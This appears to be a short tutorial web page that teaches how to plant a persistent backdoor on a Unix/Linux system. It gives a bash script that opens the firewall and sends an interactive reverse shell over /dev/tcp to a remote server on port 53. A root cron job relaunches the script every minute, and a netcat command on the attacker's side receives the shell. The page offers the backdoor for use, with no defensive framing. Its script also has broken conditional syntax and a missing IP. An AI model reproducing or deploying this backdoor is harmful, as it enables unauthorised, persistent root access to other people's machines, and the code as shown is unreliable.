Tiny Unix/Linux Backdoor


The tiny backdoor base in bash and cron, less than 10 line source code can get the bash shell remotely. Use in Unix/Linux system.

Step 1: Create a sh script file

We need to create a sh script file in any location and type the code, now we stored it in /usr/backdoor:

nano /usr/backdoor

if netstat -ano | grep -v grep | grep "" > /dev/null
    echo "OK" > /dev/null
    /sbin/iptables --policy INPUT ACCEPT
    /sbin/iptables --policy OUTPUT ACCEPT
    bash -i >& /dev/tcp/ 0>&1

chmod +x /usr/backdoor


This code is to send the shell to the server which IP is and port is 53, and will check the connection automatically, if the server connected to the server yet, will no make a new connection.

Step 2: Create a cron scheduler

We create a scheduler let this script run automatic, so we can get the shell by waiting the task finished.

nano /etc/cron.d/backdoor //Create scheduler in /etc/crontab will be better.

*/1 * * * * root /usr/backdoor       //Make a connection per minutes.

service cron reload //Maybe different way to reload the cron.

Step 3: Receive the shell in your remote server

Using netcat to receive the shell from client.

nc -vv -lp 53


And just wait a minutes, enjoy the backdoor shell.


Tags: backdoor, unix, linux, bash

Write a new comment